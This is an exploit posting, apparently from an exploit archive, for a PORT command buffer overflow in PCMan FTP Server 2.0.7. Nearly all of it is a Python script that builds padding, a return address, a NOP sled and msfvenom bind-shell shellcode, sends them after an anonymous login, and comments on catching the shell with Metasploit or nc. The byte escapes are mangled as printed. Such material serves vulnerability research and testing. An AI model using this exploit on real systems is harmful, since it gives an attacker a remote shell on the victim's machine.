PCMan FTP Server 2.0.7 PORT Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit # Author: Pablo GonzA!lez # Date: 4/11/2016 # Software: PCMan 2.0 # Tested on: Windows XP Profesional SP3 Spanish x86 import socket print "Creating malicious input!" junk = 'x41'*2007 ret="xf7x56x3cx7e" #User32.dll 7E3C56F7 nops = 'x90'*20 #msfvenom -p windows/shell_bind_tcp LPORT=1144 -b 'x0ax00x0d' -f c #put shellcode in variable 'sc' sc=("xdbxd6xbaxd3x95x1bxd0xd9x74x24xf4x58x2bxc9xb1" "x53x31x50x17x83xe8xfcx03x83x86xf9x25xdfx41x7f" "xc5x1fx92xe0x4fxfaxa3x20x2bx8fx94x90x3fxddx18" "x5ax6dxf5xabx2exbaxfax1cx84x9cx35x9cxb5xddx54" "x1exc4x31xb6x1fx07x44xb7x58x7axa5xe5x31xf0x18" "x19x35x4cxa1x92x05x40xa1x47xddx63x80xd6x55x3a" "x02xd9xbax36x0bxc1xdfx73xc5x7ax2bx0fxd4xaax65" "xf0x7bx93x49x03x85xd4x6exfcxf0x2cx8dx81x02xeb" "xefx5dx86xefx48x15x30xcbx69xfaxa7x98x66xb7xac" "xc6x6ax46x60x7dx96xc3x87x51x1ex97xa3x75x7ax43" "xcdx2cx26x22xf2x2ex89x9bx56x25x24xcfxeax64x21" "x3cxc7x96xb1x2ax50xe5x83xf5xcax61xa8x7exd5x76" "xcfx54xa1xe8x2ex57xd2x21xf5x03x82x59xdcx2bx49" "x99xe1xf9xe4x91x44x52x1bx5cx36x02x9bxcexdfx48" "x14x31xffx72xfex5ax68x8fx01x60x11x06xe7x02xf1" "x4exbfxbax33xb5x08x5dx4bx9fx20xc9x04xc9xf7xf6" "x94xdfx5fx60x1fx0cx64x91x20x19xccxc6xb7xd7x9d" "xa5x26xe7xb7x5dxcax7ax5cx9dx85x66xcbxcaxc2x59" "x02x9exfexc0xbcxbcx02x94x87x04xd9x65x09x85xac" "xd2x2dx95x68xdax69xc1x24x8dx27xbfx82x67x86x69" "x5dxdbx40xfdx18x17x53x7bx25x72x25x63x94x2bx70" "x9cx19xbcx74xe5x47x5cx7ax3cxccx6cx31x1cx65xe5" "x9cxf5x37x68x1fx20x7bx95x9cxc0x04x62xbcxa1x01" "x2ex7ax5ax78x3fxefx5cx2fx40x3a") buffer= junk + ret + nops + sc s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) ip = raw_input('Give me Remote IP Address:') connect=s.connect((ip,21)) banner = s.recv(1024) print banner s.send('USER anonymous ') s.recv(1024) s.send('PASS ') s.recv(1024) #Sending input PORT command (Exploitation is coming) s.send('PORT' + buffer + ' ') s.close() #Metasploit exploit/multi/handler or nc <ip> <port> :D # # For exploit/multi/handler # # use exploit/multi/handler # set PAYLOAD windows/shell_bind_tcp # set RHOST <ip> # set LPORT 1144 # exploit # ... # Got it! print "Got it? :D"
